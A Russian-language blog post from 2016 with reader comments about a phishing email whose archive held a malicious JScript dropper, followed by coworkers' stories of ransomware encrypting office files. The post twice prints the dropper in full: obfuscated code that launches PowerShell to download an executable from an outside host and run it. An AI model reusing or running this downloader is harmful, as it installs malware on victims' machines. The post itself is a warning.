душная гомофобная троллолита
Что-то типа "вот подписанный нами акт услуг, давайте ваш р/с, оплатим"
в прикреплении архивчик, антивирь молчит.
Сливаю прикрепление - штатный антивирь говорит - ок.
А внутри архивчика скриптег:
var nazvon = new ActiveXObject("shell.application");
var kww = "assd"
nazvon.ShellExecute (String.fromCharCode(99,109,100,46,101,88,101), "/c Powershell ( ne^w-obje^ct S^yst^em.N^eT.We^bcLi^ent).DoWn^loadF^ile('washingtoniancleaners.com/1990_exe','%APPDATA%\asfbsewgg.exe');Start-Process '%APPDATA%\asfbsewgg.exe'", "", "", 0)
Мне пофиг, а ведь кто-то жмякнет.
в прикреплении архивчик, антивирь молчит.
Сливаю прикрепление - штатный антивирь говорит - ок.
А внутри архивчика скриптег:
var nazvon = new ActiveXObject("shell.application");
var kww = "assd"
nazvon.ShellExecute (String.fromCharCode(99,109,100,46,101,88,101), "/c Powershell ( ne^w-obje^ct S^yst^em.N^eT.We^bcLi^ent).DoWn^loadF^ile('washingtoniancleaners.com/1990_exe','%APPDATA%\asfbsewgg.exe');Start-Process '%APPDATA%\asfbsewgg.exe'", "", "", 0)
Мне пофиг, а ведь кто-то жмякнет.
-
-
18.10.2016 в 12:05-
-
18.10.2016 в 12:09-
-
18.10.2016 в 12:16-
-
18.10.2016 в 12:20-
-
18.10.2016 в 12:29-
-
18.10.2016 в 13:02Нам на работе частенько приходит что-то подобное, живу в тревожном ожидании, что кто-то из бухгалтеров всё-таки нажмёт на файл якобы от Ростелекома.
-
-
18.10.2016 в 13:11Стандартно - шифровальщик файлов.
На моей памяти у меня два раза на работе запустили (спасались суточными бэкапами)
И два раза у сторонних клиентов - вот там был самый настоящий адище.
-
-
18.10.2016 в 13:16Понятно, спасибо.
Недавно они нажали на нечто от знакомого корреспондента - но с расширением .js - зашифровать не зашифровало (хотя грозилось), но неубираемый баннер на весь Рабочий стол повесило.
-
-
18.10.2016 в 13:43зашифровало все, до чего дотянулось, причем гадил на глазах, в которых стояли секретарские слезы.
пропала база с документацией за несколько лет. до сих пор восстанавливают, чо)
-
-
18.10.2016 в 19:22И нужные для работы тыщи файлов все упорно хранили вне бэкапящихся папок, а где-то в Е:\МОЕ. Одна даже буквально.
-
-
18.10.2016 в 21:20У нас зашифровало (пока) только один раз: на первой неделе работы новой сотрудницы. Особую пикантность ситуации придавало то, что она устроилась на должность оператора ЭВМ, а фактически программиста (мы бюджетники, нам на 30 компов программист ни один не полагается, только "операторы"). Одно хорошо - ничего важного на той машине накопиться не успело
Маккуро Куроске
причём три из них - одна и та же сотрудница
Ну, это уже за гранью добра и зла
-
-
18.10.2016 в 22:08-
-
19.10.2016 в 07:59